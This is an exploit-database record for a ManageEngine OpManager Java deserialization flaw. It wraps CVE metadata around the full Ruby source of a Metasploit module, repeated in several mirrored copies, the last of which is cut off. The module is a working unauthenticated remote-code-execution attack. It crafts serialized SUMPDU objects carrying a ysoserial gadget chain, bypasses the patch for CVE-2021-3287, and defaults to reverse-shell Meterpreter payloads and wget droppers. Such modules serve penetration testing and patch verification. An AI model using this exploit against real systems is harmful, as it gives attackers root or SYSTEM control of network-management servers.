ManageEngine OpManager SumPDU Java Deserialization

2021-09-21T00:00:00

Description

{"id": "PACKETSTORM:164231", "type": "packetstorm", "bulletinFamily": "exploit", "title": "ManageEngine OpManager SumPDU Java Deserialization", "description": "", "published": "2021-09-21T00:00:00", "modified": "2021-09-21T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://packetstormsecurity.com/files/164231/ManageEngine-OpManager-SumPDU-Java-Deserialization.html", "reporter": "Spencer McIntyre", "references": [], "cvelist": ["CVE-2020-28653", "CVE-2021-3287"], "immutableFields": [], "lastseen": "2021-09-21T16:00:31", "viewCount": 76, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-28653", "CVE-2021-3287"]}, {"type": "githubexploit", "idList": ["0F834290-5FF5-5671-950A-8A63A82265B0"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/OPMANAGER_SUMPDU_DESERIALIZATION/"]}, {"type": "nessus", "idList": ["MANAGEENGINE_OPMANAGER_CVE-2020-28653.NBIN"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:E8FC7BBDB9A9C360054240EFAF9BA636"]}, {"type": "zdt", "idList": ["1337DAY-ID-36780"]}]}, "score": {"value": 5.4, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2020-28653"]}, {"type": "githubexploit", "idList": ["0F834290-5FF5-5671-950A-8A63A82265B0"]}, {"type": "nessus", "idList": ["MANAGEENGINE_OPMANAGER_CVE-2020-28653.NBIN"]}, {"type": "zdt", "idList": ["1337DAY-ID-36780"]}]}, "exploitation": null, "vulnersScore": 5.4}, "sourceHref": "https://packetstormsecurity.com/files/download/164231/opmanager_sumpdu_deserialization.rb.txt", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Powershell \ninclude Rex::Java \n \nJAVA_SERIALIZED_STRING = [ Serialization::TC_STRING, 0 ].pack('Cn') \nJAVA_SERIALIZED_STRING_ARRAY = \"\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\"\\ \n\"\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\xad\\xd2\\x56\\xe7\\xe9\\x1d\\x7b\\x47\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x00\".b \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'ManageEngine OpManager SumPDU Java Deserialization', \n'Description' => %q{ \nAn HTTP endpoint used by the Manage Engine OpManager Smart Update Manager component can be leveraged to \ndeserialize an arbitrary Java object. This can be abused by an unauthenticated remote attacker to execute OS \ncommands in the context of the OpManager application (NT AUTHORITY\\SYSTEM on Windows or root on Linux). This \nvulnerability is also present in other products that are built on top of the OpManager application. This \nvulnerability affects OpManager versions 12.1 - 12.5.328. \n \nAutomatic CVE selection only works for newer targets when the build number is present in the logon page. Due \nto issues with the serialized payload this module is incompatible with versions prior to 12.3.238 despite them \ntechnically being vulnerable. \n}, \n'Author' => [ \n'Johannes Moritz', # Original Vulnerability Research \n'Robin Peraglie', # Original Vulnerability Research \n'Spencer McIntyre' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'Arch' => [ARCH_CMD, ARCH_PYTHON, ARCH_X86, ARCH_X64], \n'Platform' => [ 'win', 'linux', 'python', 'unix' ], \n'References' => [ \n[ 'CVE', '2020-28653' ], # original CVE \n[ 'CVE', '2021-3287' ], # patch bypass \n[ 'URL', 'https://haxolot.com/posts/2021/manageengine_opmanager_pre_auth_rce/' ] \n], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Windows Command', \n{ \n'Arch' => ARCH_CMD, \n'Platform' => 'win', \n'Type' => :win_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' \n} \n} \n], \n[ \n'Windows Dropper', \n{ \n'Arch' => [ARCH_X86, ARCH_X64], \n'Platform' => 'win', \n'Type' => :win_dropper, \n'DefaultOptions' => { \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' \n} \n} \n], \n[ \n'Windows PowerShell', \n{ \n'Arch' => [ARCH_X86, ARCH_X64], \n'Platform' => 'win', \n'Type' => :win_psh, \n'DefaultOptions' => { \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' \n} \n} \n], \n[ \n'Unix Command', \n{ \n'Arch' => ARCH_CMD, \n'Platform' => 'unix', \n'Type' => :nix_cmd \n} \n], \n[ \n'Linux Dropper', \n{ \n'Arch' => [ARCH_X86, ARCH_X64], \n'Platform' => 'linux', \n'Type' => :nix_dropper, \n'DefaultOptions' => { \n'CMDSTAGER::FLAVOR' => 'wget', \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n} \n], \n[ \n'Python', \n{ \n'Arch' => ARCH_PYTHON, \n'Platform' => 'python', \n'Type' => :python, \n'DefaultOptions' => { \n'PAYLOAD' => 'python/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DefaultOptions' => { \n'RPORT' => 8060 \n}, \n'DefaultTarget' => 0, \n'DisclosureDate' => '2021-07-26', \n'Notes' => { \n'Reliability' => [ REPEATABLE_SESSION ], \n'SideEffects' => [ ARTIFACTS_ON_DISK ], \n'Stability' => [ CRASH_SAFE ] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [ true, 'OpManager path', '/']), \nOptEnum.new('CVE', [ true, 'Vulnerability to use', 'Automatic', [ 'Automatic', 'CVE-2020-28653', 'CVE-2021-3287' ] ]) \n]) \nend \n \ndef check \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/servlets/com.adventnet.tools.sum.transport.SUMHandShakeServlet'), \n'data' => build_java_serialized_int(1002) \n}) \nreturn Exploit::CheckCode::Unknown unless res \n# the patched version will respond back with 200 OK and no data in the response body \nreturn Exploit::CheckCode::Safe unless res.code == 200 && res.body.start_with?(\"\\xac\\xed\\x00\\x05\".b) \n \nExploit::CheckCode::Detected \nend \n \ndef exploit \n# Step 1: Establish a valid HTTP session \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path), \n'keep_cookies' => true \n}) \nunless res&.code == 200 && res.get_cookies =~ /JSESSIONID=/ \nfail_with(Failure::UnexpectedReply, 'Failed to establish an HTTP session') \nend \nprint_status('An HTTP session cookie has been issued') \nif (@vulnerability = datastore['CVE']) == 'Automatic' \n# if selecting the vulnerability automatically, use version detection \nif (version = res.body[%r{(?<=cachestart/)(\\d{6})(?=/cacheend)}]&.to_i).nil? \nfail_with(Failure::UnexpectedReply, 'Could not identify the remote version number') \nend \n \nversion = Rex::Version.new(\"#{version / 10000}.#{(version % 10000) / 1000}.#{version % 1000}\") \nprint_status(\"Detected version: #{version}\") \nif version < Rex::Version.new('12.1') \nfail_with(Failure::NotVulnerable, 'Versions < 12.1 are not affected by the vulnerability') \nelsif version < Rex::Version.new('12.5.233') \n@vulnerability = 'CVE-2020-28653' \nelsif version < Rex::Version.new('12.5.329') \n@vulnerability = 'CVE-2021-3287' \nelse \nfail_with(Failure::NotVulnerable, 'Versions > 12.5.328 are not affected by this vulnerability') \nend \nend \n \n# Step 2: Add the requestHandler to the HTTP session \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/servlets/com.adventnet.tools.sum.transport.SUMHandShakeServlet'), \n'keep_cookies' => true, \n'data' => build_java_serialized_int(1002) \n}) \nunless res&.code == 200 \nfail_with(Failure::UnexpectedReply, 'Failed to setup the HTTP session') \nend \nprint_status('The request handler has been associated with the HTTP session') \n \nif @vulnerability == 'CVE-2021-3287' \n# need to send an OPEN_SESSION request to the SUM PDU handler so the SUMServerIOAndDataAnalyzer object is \n# initialized and made ready to process subsequent requests \nsend_sumpdu(build_sumpdu(data: build_java_serialized_int(0))) \nend \n \n# Step 3: Exploit the deserialization vulnerability to run commands \ncase target['Type'] \nwhen :nix_dropper \nexecute_cmdstager \nwhen :win_dropper \nexecute_cmdstager \nwhen :win_psh \nexecute_command(cmd_psh_payload( \npayload.encoded, \npayload.arch.first, \nremove_comspec: true \n)) \nelse \nexecute_command(payload.encoded) \nend \nend \n \ndef build_java_serialized_int(int) \nstream = Serialization::Model::Stream.new \nstream.contents << Serialization::Model::BlockData.new(stream, [ int ].pack('N')) \nstream.encode \nend \n \ndef build_sumpdu(data: '') \n# build a serialized SUMPDU object with a custom data block \nsumpdu = \"\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x27\\x63\\x6f\\x6d\\x2e\\x61\\x64\\x76\\x65\".b \nsumpdu << \"\\x6e\\x74\\x6e\\x65\\x74\\x2e\\x74\\x6f\\x6f\\x6c\\x73\\x2e\\x73\\x75\\x6d\\x2e\".b \nsumpdu << \"\\x70\\x72\\x6f\\x74\\x6f\\x63\\x6f\\x6c\\x2e\\x53\\x55\\x4d\\x50\\x44\\x55\\x24\".b \nsumpdu << \"\\x29\\xfc\\x8a\\x86\\x1b\\xfd\\xed\\x03\\x00\\x03\\x5b\\x00\\x04\\x64\\x61\\x74\".b \nsumpdu << \"\\x61\\x74\\x00\\x02\\x5b\\x42\\x4c\\x00\\x02\\x69\\x64\\x74\\x00\\x12\\x4c\\x6a\".b \nsumpdu << \"\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\".b \nsumpdu << \"\\x4c\\x00\\x08\\x75\\x6e\\x69\\x71\\x75\\x65\\x49\\x44\\x71\\x00\\x7e\\x00\\x02\".b \nsumpdu << \"\\x78\\x70\\x7a\" + [ 0x14 + data.length ].pack('N') \nsumpdu << \"\\x00\\x0c\\x4f\\x50\\x45\\x4e\\x5f\\x53\\x45\\x53\\x53\\x49\\x4f\\x4e\\x00\\x00\".b \nsumpdu << \"\\x00\\x00\" \nsumpdu << [ data.length ].pack('n') + data \nsumpdu << \"\\x78\".b \nsumpdu \nend \n \ndef send_sumpdu(sumpdu) \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/servlets/com.adventnet.tools.sum.transport.SUMCommunicationServlet'), \n'keep_cookies' => true, \n'data' => [ sumpdu.length ].pack('N') + sumpdu \n}) \nres \nend \n \ndef execute_command(cmd, _opts = {}) \n# An executable needs to be prefixed to the command to make it compatible with the way in which the gadget chain \n# will execute it. \ncase target['Platform'] \nwhen 'python' \ncmd.prepend('python -c ') \nwhen 'win' \ncmd.prepend('cmd.exe /c ') \nelse \ncmd.gsub!(/\\s+/, '${IFS}') \ncmd.prepend('sh -c ') \nend \n \nvprint_status(\"Executing command: #{cmd}\") \n# the frohoff/ysoserial#168 gadget chain is a derivative of CommonsBeanutils1 that has been updated to remove the \n# dependency on the commons-collections library making it usable in this context \njava_payload = Msf::Util::JavaDeserialization.ysoserial_payload('frohoff/ysoserial#168', cmd) \n \nif @vulnerability == 'CVE-2020-28653' \n# in this version, the SUM PDU that is deserialized is the malicious object \nsum_pdu = java_payload \nelsif @vulnerability == 'CVE-2021-3287' \n# the patch bypass exploits a flaw in the ITOMObjectInputStream where it can be put into a state that allows \n# arbitrary objects to be deserialized by first sending an object of the expected type \npdu_data = build_java_serialized_int(2) # 2 is some kind of control code necessary to execute the desired code path \npdu_data << JAVA_SERIALIZED_STRING \npdu_data << JAVA_SERIALIZED_STRING \npdu_data << JAVA_SERIALIZED_STRING \npdu_data << JAVA_SERIALIZED_STRING_ARRAY \npdu_data << Serialization::TC_RESET \npdu_data << java_payload.delete_prefix(\"\\xac\\xed\\x00\\x05\".b) \nsum_pdu = build_sumpdu(data: pdu_data) \nend \n \nres = send_sumpdu(sum_pdu) \nfail_with(Failure::UnexpectedReply, 'Failed to execute the command') unless res&.code == 200 \nend \nend \n`\n", "_state": {"dependencies": 1647589307, "score": 0}}

{"metasploit": [{"lastseen": "2022-06-24T08:36:59", "description": "An HTTP endpoint used by the Manage Engine OpManager Smart Update Manager component can be leveraged to deserialize an arbitrary Java object. This can be abused by an unauthenticated remote attacker to execute OS commands in the context of the OpManager application (NT AUTHORITY\\SYSTEM on Windows or root on Linux). This vulnerability is also present in other products that are built on top of the OpManager application. This vulnerability affects OpManager versions 12.1 - 12.5.328. Automatic CVE selection only works for newer targets when the build number is present in the logon page. Due to issues with the serialized payload this module is incompatible with versions prior to 12.3.238 despite them technically being vulnerable.\n", "cvss3": {}, "published": "2021-09-14T13:10:44", "type": "metasploit", "title": "ManageEngine OpManager SumPDU Java Deserialization", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-28653", "CVE-2021-3287"], "modified": "2021-09-16T21:08:23", "id": "MSF:EXPLOIT-MULTI-HTTP-OPMANAGER_SUMPDU_DESERIALIZATION-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/opmanager_sumpdu_deserialization/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Powershell\n include Rex::Java\n\n JAVA_SERIALIZED_STRING = [ Serialization::TC_STRING, 0 ].pack('Cn')\n JAVA_SERIALIZED_STRING_ARRAY = \"\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\"\\\n \"\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\xad\\xd2\\x56\\xe7\\xe9\\x1d\\x7b\\x47\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x00\".b\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'ManageEngine OpManager SumPDU Java Deserialization',\n 'Description' => %q{\n An HTTP endpoint used by the Manage Engine OpManager Smart Update Manager component can be leveraged to\n deserialize an arbitrary Java object. This can be abused by an unauthenticated remote attacker to execute OS\n commands in the context of the OpManager application (NT AUTHORITY\\SYSTEM on Windows or root on Linux). This\n vulnerability is also present in other products that are built on top of the OpManager application. This\n vulnerability affects OpManager versions 12.1 - 12.5.328.\n\n Automatic CVE selection only works for newer targets when the build number is present in the logon page. Due\n to issues with the serialized payload this module is incompatible with versions prior to 12.3.238 despite them\n technically being vulnerable.\n },\n 'Author' => [\n 'Johannes Moritz', # Original Vulnerability Research\n 'Robin Peraglie', # Original Vulnerability Research\n 'Spencer McIntyre' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Arch' => [ARCH_CMD, ARCH_PYTHON, ARCH_X86, ARCH_X64],\n 'Platform' => [ 'win', 'linux', 'python', 'unix' ],\n 'References' => [\n [ 'CVE', '2020-28653' ], # original CVE\n [ 'CVE', '2021-3287' ], # patch bypass\n [ 'URL', 'https://haxolot.com/posts/2021/manageengine_opmanager_pre_auth_rce/' ]\n ],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Windows Command',\n {\n 'Arch' => ARCH_CMD,\n 'Platform' => 'win',\n 'Type' => :win_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'\n }\n }\n ],\n [\n 'Windows Dropper',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Platform' => 'win',\n 'Type' => :win_dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Windows PowerShell',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Platform' => 'win',\n 'Type' => :win_psh,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Unix Command',\n {\n 'Arch' => ARCH_CMD,\n 'Platform' => 'unix',\n 'Type' => :nix_cmd\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Platform' => 'linux',\n 'Type' => :nix_dropper,\n 'DefaultOptions' => {\n 'CMDSTAGER::FLAVOR' => 'wget',\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Python',\n {\n 'Arch' => ARCH_PYTHON,\n 'Platform' => 'python',\n 'Type' => :python,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'python/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultOptions' => {\n 'RPORT' => 8060\n },\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2021-07-26',\n 'Notes' => {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'SideEffects' => [ ARTIFACTS_ON_DISK ],\n 'Stability' => [ CRASH_SAFE ]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [ true, 'OpManager path', '/']),\n OptEnum.new('CVE', [ true, 'Vulnerability to use', 'Automatic', [ 'Automatic', 'CVE-2020-28653', 'CVE-2021-3287' ] ])\n ])\n end\n\n def check\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/servlets/com.adventnet.tools.sum.transport.SUMHandShakeServlet'),\n 'data' => build_java_serialized_int(1002)\n })\n return Exploit::CheckCode::Unknown unless res\n # the patched version will respond back with 200 OK and no data in the response body\n return Exploit::CheckCode::Safe unless res.code == 200 && res.body.start_with?(\"\\xac\\xed\\x00\\x05\".b)\n\n Exploit::CheckCode::Detected\n end\n\n def exploit\n # Step 1: Establish a valid HTTP session\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path),\n 'keep_cookies' => true\n })\n unless res&.code == 200 && res.get_cookies =~ /JSESSIONID=/\n fail_with(Failure::UnexpectedReply, 'Failed to establish an HTTP session')\n end\n print_status('An HTTP session cookie has been issued')\n if (@vulnerability = datastore['CVE']) == 'Automatic'\n # if selecting the vulnerability automatically, use version detection\n if (version = res.body[%r{(?<=cachestart/)(\\d{6})(?=/cacheend)}]&.to_i).nil?\n fail_with(Failure::UnexpectedReply, 'Could not identify the remote version number')\n end\n\n version = Rex::Version.new(\"#{version / 10000}.#{(version % 10000) / 1000}.#{version % 1000}\")\n print_status(\"Detected version: #{version}\")\n if version < Rex::Version.new('12.1')\n fail_with(Failure::NotVulnerable, 'Versions < 12.1 are not affected by the vulnerability')\n elsif version < Rex::Version.new('12.5.233')\n @vulnerability = 'CVE-2020-28653'\n elsif version < Rex::Version.new('12.5.329')\n @vulnerability = 'CVE-2021-3287'\n else\n fail_with(Failure::NotVulnerable, 'Versions > 12.5.328 are not affected by this vulnerability')\n end\n end\n\n # Step 2: Add the requestHandler to the HTTP session\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/servlets/com.adventnet.tools.sum.transport.SUMHandShakeServlet'),\n 'keep_cookies' => true,\n 'data' => build_java_serialized_int(1002)\n })\n unless res&.code == 200\n fail_with(Failure::UnexpectedReply, 'Failed to setup the HTTP session')\n end\n print_status('The request handler has been associated with the HTTP session')\n\n if @vulnerability == 'CVE-2021-3287'\n # need to send an OPEN_SESSION request to the SUM PDU handler so the SUMServerIOAndDataAnalyzer object is\n # initialized and made ready to process subsequent requests\n send_sumpdu(build_sumpdu(data: build_java_serialized_int(0)))\n end\n\n # Step 3: Exploit the deserialization vulnerability to run commands\n case target['Type']\n when :nix_dropper\n execute_cmdstager\n when :win_dropper\n execute_cmdstager\n when :win_psh\n execute_command(cmd_psh_payload(\n payload.encoded,\n payload.arch.first,\n remove_comspec: true\n ))\n else\n execute_command(payload.encoded)\n end\n end\n\n def build_java_serialized_int(int)\n stream = Serialization::Model::Stream.new\n stream.contents << Serialization::Model::BlockData.new(stream, [ int ].pack('N'))\n stream.encode\n end\n\n def build_sumpdu(data: '')\n # build a serialized SUMPDU object with a custom data block\n sumpdu = \"\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x27\\x63\\x6f\\x6d\\x2e\\x61\\x64\\x76\\x65\".b\n sumpdu << \"\\x6e\\x74\\x6e\\x65\\x74\\x2e\\x74\\x6f\\x6f\\x6c\\x73\\x2e\\x73\\x75\\x6d\\x2e\".b\n sumpdu << \"\\x70\\x72\\x6f\\x74\\x6f\\x63\\x6f\\x6c\\x2e\\x53\\x55\\x4d\\x50\\x44\\x55\\x24\".b\n sumpdu << \"\\x29\\xfc\\x8a\\x86\\x1b\\xfd\\xed\\x03\\x00\\x03\\x5b\\x00\\x04\\x64\\x61\\x74\".b\n sumpdu << \"\\x61\\x74\\x00\\x02\\x5b\\x42\\x4c\\x00\\x02\\x69\\x64\\x74\\x00\\x12\\x4c\\x6a\".b\n sumpdu << \"\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\".b\n sumpdu << \"\\x4c\\x00\\x08\\x75\\x6e\\x69\\x71\\x75\\x65\\x49\\x44\\x71\\x00\\x7e\\x00\\x02\".b\n sumpdu << \"\\x78\\x70\\x7a\" + [ 0x14 + data.length ].pack('N')\n sumpdu << \"\\x00\\x0c\\x4f\\x50\\x45\\x4e\\x5f\\x53\\x45\\x53\\x53\\x49\\x4f\\x4e\\x00\\x00\".b\n sumpdu << \"\\x00\\x00\"\n sumpdu << [ data.length ].pack('n') + data\n sumpdu << \"\\x78\".b\n sumpdu\n end\n\n def send_sumpdu(sumpdu)\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/servlets/com.adventnet.tools.sum.transport.SUMCommunicationServlet'),\n 'keep_cookies' => true,\n 'data' => [ sumpdu.length ].pack('N') + sumpdu\n })\n res\n end\n\n def execute_command(cmd, _opts = {})\n # An executable needs to be prefixed to the command to make it compatible with the way in which the gadget chain\n # will execute it.\n case target['Platform']\n when 'python'\n cmd.prepend('python -c ')\n when 'win'\n cmd.prepend('cmd.exe /c ')\n else\n cmd.gsub!(/\\s+/, '${IFS}')\n cmd.prepend('sh -c ')\n end\n\n vprint_status(\"Executing command: #{cmd}\")\n # the frohoff/ysoserial#168 gadget chain is a derivative of CommonsBeanutils1 that has been updated to remove the\n # dependency on the commons-collections library making it usable in this context\n java_payload = Msf::Util::JavaDeserialization.ysoserial_payload('frohoff/ysoserial#168', cmd)\n\n if @vulnerability == 'CVE-2020-28653'\n # in this version, the SUM PDU that is deserialized is the malicious object\n sum_pdu = java_payload\n elsif @vulnerability == 'CVE-2021-3287'\n # the patch bypass exploits a flaw in the ITOMObjectInputStream where it can be put into a state that allows\n # arbitrary objects to be deserialized by first sending an object of the expected type\n pdu_data = build_java_serialized_int(2) # 2 is some kind of control code necessary to execute the desired code path\n pdu_data << JAVA_SERIALIZED_STRING\n pdu_data << JAVA_SERIALIZED_STRING\n pdu_data << JAVA_SERIALIZED_STRING\n pdu_data << JAVA_SERIALIZED_STRING_ARRAY\n pdu_data << Serialization::TC_RESET\n pdu_data << java_payload.delete_prefix(\"\\xac\\xed\\x00\\x05\".b)\n sum_pdu = build_sumpdu(data: pdu_data)\n end\n\n res = send_sumpdu(sum_pdu)\n fail_with(Failure::UnexpectedReply, 'Failed to execute the command') unless res&.code == 200\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/opmanager_sumpdu_deserialization.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2021-12-23T13:19:33", "description": "An HTTP endpoint used by the Manage Engine OpManager Smart Update Manager component can be leveraged to deserialize an arbitrary Java object. This can be abused by an unauthenticated remote attacker to execute OS commands in the context of the OpManager application. This vulnerability is also present in other products that are built on top of the OpManager application. This vulnerability affects OpManager versions 12.1 through 12.5.328.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-21T00:00:00", "type": "zdt", "title": "ManageEngine OpManager SumPDU Java Deserialization Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3287", "CVE-2020-28653"], "modified": "2021-09-21T00:00:00", "id": "1337DAY-ID-36780", "href": "https://0day.today/exploit/description/36780", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Powershell\n include Rex::Java\n\n JAVA_SERIALIZED_STRING = [ Serialization::TC_STRING, 0 ].pack('Cn')\n JAVA_SERIALIZED_STRING_ARRAY = \"\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\"\\\n \"\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\xad\\xd2\\x56\\xe7\\xe9\\x1d\\x7b\\x47\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x00\".b\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'ManageEngine OpManager SumPDU Java Deserialization',\n 'Description' => %q{\n An HTTP endpoint used by the Manage Engine OpManager Smart Update Manager component can be leveraged to\n deserialize an arbitrary Java object. This can be abused by an unauthenticated remote attacker to execute OS\n commands in the context of the OpManager application (NT AUTHORITY\\SYSTEM on Windows or root on Linux). This\n vulnerability is also present in other products that are built on top of the OpManager application. This\n vulnerability affects OpManager versions 12.1 - 12.5.328.\n\n Automatic CVE selection only works for newer targets when the build number is present in the logon page. Due\n to issues with the serialized payload this module is incompatible with versions prior to 12.3.238 despite them\n technically being vulnerable.\n },\n 'Author' => [\n 'Johannes Moritz', # Original Vulnerability Research\n 'Robin Peraglie', # Original Vulnerability Research\n 'Spencer McIntyre' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Arch' => [ARCH_CMD, ARCH_PYTHON, ARCH_X86, ARCH_X64],\n 'Platform' => [ 'win', 'linux', 'python', 'unix' ],\n 'References' => [\n [ 'CVE', '2020-28653' ], # original CVE\n [ 'CVE', '2021-3287' ], # patch bypass\n [ 'URL', 'https://haxolot.com/posts/2021/manageengine_opmanager_pre_auth_rce/' ]\n ],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Windows Command',\n {\n 'Arch' => ARCH_CMD,\n 'Platform' => 'win',\n 'Type' => :win_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'\n }\n }\n ],\n [\n 'Windows Dropper',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Platform' => 'win',\n 'Type' => :win_dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Windows PowerShell',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Platform' => 'win',\n 'Type' => :win_psh,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Unix Command',\n {\n 'Arch' => ARCH_CMD,\n 'Platform' => 'unix',\n 'Type' => :nix_cmd\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Platform' => 'linux',\n 'Type' => :nix_dropper,\n 'DefaultOptions' => {\n 'CMDSTAGER::FLAVOR' => 'wget',\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Python',\n {\n 'Arch' => 